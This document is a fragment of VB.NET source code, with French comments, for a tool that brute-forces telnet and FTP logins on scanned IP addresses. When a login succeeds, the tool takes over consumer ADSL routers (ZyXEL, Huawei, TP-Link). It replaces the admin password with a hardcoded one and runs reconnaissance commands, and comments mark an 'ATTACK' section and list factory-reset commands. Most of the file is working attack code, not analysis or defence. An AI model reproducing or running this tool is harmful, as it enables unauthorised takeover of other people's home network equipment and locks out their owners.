- 'gunzip portmap wrjpgcom
- 'gzip poweroff xargs
- 'halt pppd yes
- 'halt.sysvinit printf zcat
- 'hddtemp ps zeroconf
- 'hdparm pwd
- 'root@dm800:~#
- 'root@dm800:~# passwd
- 'Changing password for root
- 'Enter the new password (minimum of 5, maximum of 8 characters)
- 'Please use a combination of upper and lower case letters and numbers.
- 'Enter new password:
- 'Re-enter new password:
- 'Password changed.
- 'root@dm800:~#
- '********************************************************
- 'BusyBox on (none) login: bad
- 'Password:
- 'Login incorrect
- 'BusyBox on (none) login: admin
- 'Password:
- 'BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
- 'Enter 'help' for a list of built-in commands.
- '# help
- 'Built-in commands:
- '-------------------
- ' . : bg break builtin cd chdir continue eval exec exit export
- ' false fc fg hash help jobs kill local pwd read readonly return
- ' set setvar shift times trap true type ulimit umask unset wait
- '********************************************************
- 'User Access Verification
- '
- 'Password:
- 'Password:
- 'Password:
- '% Bad passwords
- '********************************************************
- 'Huawei Home Gateway 550
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'Login: bad
- 'Password:
- 'Login incorrect. Try again.
- 'Login: admin
- 'Password:
- 'Login incorrect. Try again.
- 'Login: admin
- 'Password:
- 'Authorization failed after trying 3 times!!!.
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'wl driver adapter not found
- 'Login:
- '#End Region
- For Each password As String In passwords
- Thread.Sleep(100)
- Try
- Sock_scan = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
- Sock_scan.Connect(ip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- ' Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);
- 'Console.WriteLine("DEBUG Trying Password:{0}", password);
- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password & vbCr), SocketFlags.None)
- '
- ' Byte[] smk = new Byte[password.Length];
- ' for (int i = 0; i < password.Length; i++)
- ' {
- ' Byte ss = Convert.ToByte(password[i]);
- ' smk[i] = ss;
- ' }
- ' Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
- '
- 'Thread.Sleep(100);
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- 'Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet02: " & stringdata, myip)
- If stringdata = "" Then
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet02b: " & stringdata, myip)
- End If
- 'stringdata = null;
- 'bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- 'stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- 'Console.WriteLine("Response telnet: " + strRetPage);
- 'while (bytes > 0)
- '{
- ' bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- ' stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
- ' Console.WriteLine("Response telnet: " + strRetPage);
- '}
- 'Bad Password!!!
- If stringdata.Contains("assword:") OrElse stringdata.Contains("Bad Password") Then
- 'stringdata.Contains("*")
- ' Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
- Sock_scan.Close()
- Else
- Console.WriteLine("***********************************************************")
- Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}" & vbLf, myip, password)
- Console.WriteLine("***********************************************************")
- If stringdata.Contains("ZyXEL") Then
- '1234
- If stringdata.Contains("Menu") Then
- '1234
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- ' Menu 23 - System Password
- 'Old Password= ?
- 'New Password= ?
- 'Retype to confirm= ?
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- '(Saving to ROM...)
- 'Retour menu
- Console.WriteLine("{0} -> " & stringdata, myip)
- Else
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- End If
- Else
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- 'save ok, new password is: j3R0m3!!.
- '''/Exemple: Vulcan
- '''/Erreur: Commande Invalide
- '''/$passwd
- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
- '''/Enter Old Password:
- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- '''/Enter New Password:
- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- '''/Confirm New Password:
- 'Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- '''/Set Done
- '''/SINON: Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
- Console.WriteLine("{0} -> " & stringdata, myip)
- End If
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- '***************
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" & vbCr), SocketFlags.None)
- 'for MAC address
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- '
- ' D-Link DSL 526B >restoredefault
- ' Huawei SmartAX MT882a >sys romreset
- ' TP-Link TD-8817 >sys romreset
- '
- '***************
- 'For MT882A
- '
- ' MT882a> ether config
- ' --------------- NDIS CONFIGURATION BLOCK ----------------
- ' type=1 flags=0001
- ' Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
- ' task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
- ' board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
- ' board-pp (8042c8f0)
- ' 804273fc
- ' line-pp (8042c8f4)
- ' 8042956c
- ' chann-pp (8042c8f8)
- ' 804bf8a4 804bfe34
- ' --------------- BOARD DISPLAY ---------------------------
- ' ID slot# n-line n-chann status line-cfg chann-cfg
- ' 00 0 1 2 0001 8042c8bc 8042c8d0
- ' --------------- LINE DISPLAY ---------------------------
- ' ID line# board-id n-chann chann-cfg
- ' 00 1 00 2 8042c8d0
- ' --------------- CHANNEL DISPLAY -------------------------
- ' ID chan# line-id board-id address name
- ' 00 1 00 00 804bf8a4 enet0
- ' 01 2 00 00 804bfe34 enet1
- '
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- '
- ' MT882a> ip tcp status
- ' ( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
- ' ( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
- ' ( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
- ' ( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
- ' ( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
- ' (11)tcpOutSegs 2549 (12)tcpRetransSegs 389
- ' (14)tcpInErrs 2 (15)tcpOutRsts 93
- ' tcbsInUseCnt = 4
- ' &TCB Rcv-Q Snd-Q Local socket Remote socket State
- ' 804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
- ' 804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
- ' 804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
- ' 804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
- '
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> " & stringdata, myip)
- 'ATTACK
- '
- ' MT882a> ip ping
- ' Usage: ping <hostid>
- ' MT882a> ip ping www.google.com
- ' Resolving www.google.com... 173.194.67.105
- ' sent rcvd rate rtt avg mdev max min
- ' 1 1 100 80 80 0 80 80
- ' 2 2 100 80 80 0 80 80
- ' 3 3 100 80 80 0 80 80
- '
- '
- ' MT882a> ip route
- ' status add addiface addprivate
- ' addrom drop
- ' MT882a> ip route status
- ' Dest FF Len Device Gateway Metric stat Timer Use RN
- ' 41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
- ' 192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
- ' default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
- '
- '
- ' MT882a> ether driver
- ' cnt status config ackdrop
- ' macnum ackmode etherppp wan2lan
- ' MT882a> ether driver cnt
- ' disp
- ' MT882a> ether driver cnt disp
- ' Usage: disp <name>
- ' MT882a> ether driver status
- ' Usage: driver status <ch-name>
- ' MT882a> ether driver config
- ' Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
- ' MT882a> ether driver ackdrop
- ' current ack drop number is 0
- ' ack drop cnt=0
- ' Usage: ackdrop <number>
- ' MT882a> ether driver macnum
- ' Please input allowed mac number(0~255), 0 means no limitation
- ' Current allowed mac number: 0
- ' MT882a> ether driver ackmode
- ' TCP ACK mode: off
- ' ACK length: 90
- ' TCP ACK mode type: Task
- ' MT882a> ether driver etherppp
- ' PPP check : on
- '
- ' MT882a> ether driver wan2lan
- ' Usage: wan2lan [on||off] <number>
- ' Current wan2lan feature status: off
- '
- '
- ' MT882a> wan
- ' atm node hwsar adsl
- ' tsarm
- ' MT882a> wan atm
- ' test mpoasendloop oam vcpool
- ' MT882a> wan atm test
- ' Usage: test [fix|rand|period|oam|loopback]
- ' MT882a> wan node
- ' index display clear save
- ' ispname enable disable encap
- ' mux vpi vci qos
- ' pcr scr mbs cdvt
- ' wanip remoteip bridge routeip
- ' nat rip multicast callsch
- ' service nailedup filter ppp
- ' mtu default_r
- ' MT882a> wan node display
- ' WAN node index = 1
- ' Active = no
- ' Route IP = off
- ' Bridge = off
- ' Name =
- ' Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
- ' Mux <1:LLC|2:VC> = 0
- ' VPI/VCI = 0 / 0
- ' PPPoE service name =
- ' PPP username =
- ' PPP password =
- ' PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
- ' SUA/NAT is disabled
- ' Static IP address
- ' WAN IP address = 0.0.0.0
- ' Remote IP address = 0.0.0.0
- ' Remote IP subnet mask = 0.0.0.0
- ' Idle timeout = 0
- ' Call scheduling set = 1 1 1 1
- ' Nailed-up connection = off
- ' QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
- ' QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
- ' RIP direction <0:none|1:both|2:in|3:out>= 0
- ' RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
- ' Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
- ' Incoming protocol filter set = 1 1 1 1
- ' Incoming device filter set = 1 1 1 1
- ' Outgoing protocol filter set = 1 1 1 1
- ' Outgoing device filter set = 1 1 1 1
- ' MT882a> wan node wanip
- ' Usage: wan node wanip <static> <ip address>
- ' or: wan node wanip <dynamic>
- ' errcode = -4
- '
- '
- ' MT882a> wan adsl
- ' chandata close coding defbitmap
- ' linedata open opencmd opmode
- ' perfdata reset status version
- ' vendorid utopia nearituid farituid
- ' cellcnt display rateadap dumpcondition
- ' sampletime noisegt noisemargin persisttime
- ' timeinterval defectcheck txgain targetnoise
- ' txfilter setrvid txtones snroffset
- ' errorsecond diag watchdog fwversion
- ' uptime dumprate annex
- ' MT882a> wan adsl display
- ' shutdown rateup
- ' MT882a> wan adsl fwversion
- ' DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
- '
- ' MT882a> wan adsl utopia
- ' UTOPIA parameters:
- ' level: 1
- ' fast address: 0
- ' interleaved address: 1
- ' MT882a> wan adsl coding
- ' line coding: DMT
- ' MT882a> wan adsl txtones
- ' usage: <start tone> <end tone> tone=0x6~0x1F
- ' current value: start_tone=6 end_tone=1f
- ' MT882a> wan adsl opmode
- ' operational mode: ITU G.992.5(ADSL2PLUS)
- '
- ' MT882a> wan adsl uptime
- ' ADSL uptime 122:15:16
- ' MT882a> wan adsl sampletime
- ' Usage: min
- ' MT882a> wan adsl linedata
- ' far near
- ' MT882a> wan adsl linedata near
- ' relative capacity occupation: 100%
- ' noise margin downstream: 37.0 db
- ' output power upstream: 11.3 dbm
- ' attenuation downstream: 13.7 db
- ' MT882a> wan adsl linedata far
- ' relative capacity occupation: 100%
- ' noise margin upstream: 34.5 db
- ' output power downstream: 19.3 dbm
- ' attenuation upstream: 9.6 db
- ' carrier load: number of bits per symbol(tone)
- ' tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
- ' tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
- ' tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
- ' tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
- ' tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
- ' tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
- ' tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
- ' tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
- ' tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- ' tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- '
- ' MT882a> dot1q disp
- ' 802.1Q Tagged-based VLAN: Inactive(1)
- '
- ' Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
- ' ------+--------++------+--------++------+--------++------+--------++
- ' e1 | 1 ||
- ' p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
- ' p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
- ' u | 1 ||
- ' cpu | 15 ||
- '
- ' No|Act| VID| Name | Egress Port
- ' --+---+----+-----------+------------------------------------------
- ' | Tagged Egress Port
- ' +------------------------------------------
- ' 0| N | 0| |
- ' |
- ' 1| N | 0| |
- ' |
- ' 2| N | 0| |
- ' |
- ' 3| N | 0| |
- ' |
- ' 4| N | 0| |
- ' |
- ' 5| N | 0| |
- ' |
- ' 6| N | 0| |
- ' |
- ' 7| N | 0| |
- ' |
- ' 8| N | 0| |
- ' |
- ' 9| N | 0| |
- ' |
- ' 10| N | 0| |
- ' |
- ' 11| N | 0| |
- ' |
- ' 12| N | 0| |
- ' |
- ' 13| N | 0| |
- ' |
- ' 14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
- ' |
- ' 15| Y | 15| vlan15|e1,u
- ' |
- '
- Sock_scan.Close()
- Exit Try
- End If
- Catch e As Exception
- Console.WriteLine("DEBUG EXCEPTION02: {0} -> " & e.Message, myip)
- End Try
- Next
- Else
- Console.WriteLine("{0} DEBUG no telnet Password: " & banner, myip)
- End If
- ' Sock_scan.Close();
- End Sub
- Public Shared Sub ftptry(myip As String)
- Console.WriteLine("ftptry")
- Dim data As Byte() = New Byte(1023) {}
- Dim stringdata As String
- Dim recv As Integer
- Dim adresseIP As IPAddress = IPAddress.Parse(myip)
- Dim ip As New IPEndPoint(adresseIP, 21)
- Dim Sock_scan As New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
- Sock_scan.Connect(ip)
- recv = Sock_scan.Receive(data)
- Console.WriteLine("Banner ftp: " & Encoding.ASCII.GetString(data, 0, recv))
- For Each password As String In passwords
- Try
- Console.WriteLine("{0} -> USER", myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" & Convert.ToChar(32) & "admin" & Convert.ToChar(13) & Convert.ToChar(10)))
- recv = Sock_scan.Receive(data)
- Console.WriteLine("{0} -> Response ftp: " & Encoding.ASCII.GetString(data, 0, recv), myip)
- '331 Please specify the password.
- '331 Enter PASS command
- '331 User name okay, need password.
- Console.WriteLine("{0} -> PASS", myip)
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" & Convert.ToChar(32) & password & Convert.ToChar(13) & Convert.ToChar(10)))
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response ftp: " & stringdata, myip)
- '530 Login incorrect.
- '530 Not logged in.
- '530 User admin cannot log in.
- If stringdata.Contains("530") Then
- Console.Write("{0} -> bad ftp password: {1}" & vbLf, myip, password)
- End If
- '230 User logged in, proceed.
- If stringdata.Contains("230") Then
- Console.Write("{0} -> FTP PASSWORD IS: {1}" & vbLf, myip, password)
- Exit Try
- End If
- Catch e As Exception
- Console.WriteLine("{0} -> " & e.Message, myip)
- End Try
- Next
- Sock_scan.Close()
- '
- ' FtpWebRequest reqFTP;
- ' reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
- ' reqFTP.Credentials = new NetworkCredential("login", "pass");
- ' reqFTP.KeepAlive = false;
- ' reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
- ' // On recupere la response du serveur FTP
- ' FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
- ' Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
- '
- ' /*
- ' // On récupere le flux de la réponse
- ' StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
- ' //On enregistre la liste dans un chaine
- ' string listeBrute = monStreamReader.ReadToEnd();
- ' //On recupere l'ensemble des fichiers de la chaine
- ' string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
- ' //On retourne la liste des répertoires
- ' //return liste;
- '
- End Sub
- '
- ' public static void ConnectCallback(IAsyncResult ar)
- ' {
- ' try
- ' {
- ' // Get The connection socket from the callback
- ' Socket sock1 = (Socket)ar.AsyncState;
- ' sock1.Blocking = false; // This is a non blocking IO
- ' if (sock1.Connected)
- ' {
- ' // Define a new Callback to read the data
- ' AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
- ' // Begin reading data asyncronously
- ' sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
- ' }
- ' }
- ' catch (Exception ex)
- ' {
- ' Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
- ' }
- ' }
- '
- Private Shared Sub ConnectCallback(ar As IAsyncResult)
- Try
- ' Retrieve the socket from the state object.
- Dim client As Socket = DirectCast(ar.AsyncState, Socket)
- ' Complete the connection.
- client.EndConnect(ar)
- Console.WriteLine("Socket connected to {0}", client.RemoteEndPoint.ToString())
- ' Signal that the connection has been made.
- connectDone.[Set]()
- 'cpt_th.Decrementer();
- Console.WriteLine("DEBUG ConnectCallback")
- Catch e As Exception
- Console.WriteLine("ERROR ConnectCallback: " & e.ToString())
- End Try
- End Sub
- Private Shared Sub Receive(client As Socket)
- Try
- ' Create the state object.
- Dim state As New StateObject()
- state.workSocket = client
- ' Begin receiving the data from the remote device.
- client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0, New AsyncCallback(AddressOf ReceiveCallback), state)
- Catch e As Exception
- Console.WriteLine(e.ToString())
- End Try
- End Sub
- Private Shared Sub ReceiveCallback(ar As IAsyncResult)
- Try
- ' Retrieve the state object and the client socket
- ' from the asynchronous state object.
- Dim state As StateObject = DirectCast(ar.AsyncState, StateObject)
- Dim client As Socket = state.workSocket
- ' Read data from the remote device.
- Dim bytesRead As Integer = client.EndReceive(ar)
- If bytesRead > 0 Then
- ' There might be more data, so store the data received so far.
- state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead))
- ' Get the rest of the data.
- client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0, New AsyncCallback(AddressOf ReceiveCallback), state)
- Else
- ' All the data has arrived; put it in response.
- If state.sb.Length > 1 Then
- response = state.sb.ToString()
- End If
- ' Signal that all bytes have been received.
- receiveDone.[Set]()
- End If
- Catch e As Exception
- Console.WriteLine(e.ToString())
- End Try
- End Sub
- ' State object for receiving data from remote device.
- Public Class StateObject
- ' Client socket.
- Public workSocket As Socket = Nothing
- ' Size of receive buffer.
- Public Const BufferSize As Integer = 256
- ' Receive buffer.
- Public buffer As Byte() = New Byte(BufferSize - 1) {}
- ' Received data string.
- Public sb As New StringBuilder()
- End Class
- Private Shared Function ProcessOptions(m_strLineToProcess As Byte()) As String
- Dim m_DISPLAYTEXT As String = ""
- Dim m_strTemp As String = ""
- Dim m_strOption As String = ""
- Dim m_strNormalText As String = ""
- Dim bScanDone As Boolean = False
- Dim ndx As Integer = 0
- Dim ldx As Integer = 0
- Dim ch As Char
- Try
- For i As Integer = 0 To m_strLineToProcess.Length - 1
- Dim ss As [Char] = Convert.ToChar(m_strLineToProcess(i))
- m_strTemp = m_strTemp & Convert.ToString(ss)
- Next
- While bScanDone <> True
- Dim lensmk As Integer = m_strTemp.Length
- ndx = m_strTemp.IndexOf(Convert.ToString(IAC))
- If ndx > lensmk Then
- ndx = m_strTemp.Length
- End If
- If ndx <> -1 Then
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx)
- ch = m_strTemp(ndx + 1)
- If ch = [DO] OrElse ch = DONT OrElse ch = WILL OrElse ch = WONT Then
- m_strOption = m_strTemp.Substring(ndx, 3)
- Dim txt As String = m_strTemp.Substring(ndx + 3)
- m_DISPLAYTEXT += m_strTemp.Substring(0, ndx)
- m_ListOptions.Add(m_strOption)
- m_strTemp = txt
- ElseIf ch = IAC Then
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx)
- m_strTemp = m_strTemp.Substring(ndx + 1)
- ElseIf ch = SB Then
- m_DISPLAYTEXT = m_strTemp.Substring(0, ndx)
- ldx = m_strTemp.IndexOf(Convert.ToString(SE))
- m_strOption = m_strTemp.Substring(ndx, ldx)
- m_ListOptions.Add(m_strOption)
- m_strTemp = m_strTemp.Substring(ldx)
- End If
- Else
- m_DISPLAYTEXT = m_DISPLAYTEXT & m_strTemp
- bScanDone = True
- End If
- End While
- m_strNormalText = m_DISPLAYTEXT
- Catch eP As Exception
- 'Application.Exit();
- Console.WriteLine(eP.Message, "Application Error!!!")
- End Try
- Return m_strNormalText
- End Function
- Public Shared Sub OnRecievedData(ar As IAsyncResult)
- ' Get The connection socket from the callback
- Dim sock As Socket = DirectCast(ar.AsyncState, Socket)
- sock.Blocking = False
- ' This is a non blocking IO
- ' Get The data , if any
- Dim nBytesRec As Integer = sock.EndReceive(ar)
- If nBytesRec > 0 Then
- Dim sRecieved As String = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec)
- Dim m_strLine As String = ""
- Dim myline As String = Nothing
- For i As Integer = 0 To nBytesRec - 1
- Dim ch As [Char] = Convert.ToChar(m_byBuff(i))
- Select Case ch
- Case ControlChars.Cr
- m_strLine += Convert.ToString(vbCr & vbLf)
- Exit Select
- Case ControlChars.Lf
- Exit Select
- Case Else
- m_strLine += Convert.ToString(ch)
- Exit Select
- End Select
- Next
- Try
- Dim strLinelen As Integer = m_strLine.Length
- If strLinelen = 0 Then
- m_strLine = Convert.ToString(vbCr & vbLf)
- End If
- Dim mToProcess As [Byte]() = New [Byte](strLinelen - 1) {}
- For i As Integer = 0 To strLinelen - 1
- mToProcess(i) = Convert.ToByte(m_strLine(i))
- Next
- ' Process the incoming data
- Dim mOutText As String = ProcessOptions(mToProcess)
- 'if (mOutText != "")
- ' textBox1.AppendText(mOutText);
- 'Console.WriteLine("Received data: {0}", mOutText);
- ' Respond to any incoming commands
- 'RespondToOptions();
- myline += mOutText
- Catch ex As Exception
- 'Object x = this;
- Console.WriteLine(ex.Message, "Information!")
- End Try
- Console.WriteLine("Received data: {0}", myline)
- If myline.Contains("Password:") Then
- For Each password As String In passwords
- Thread.Sleep(100)
- Try
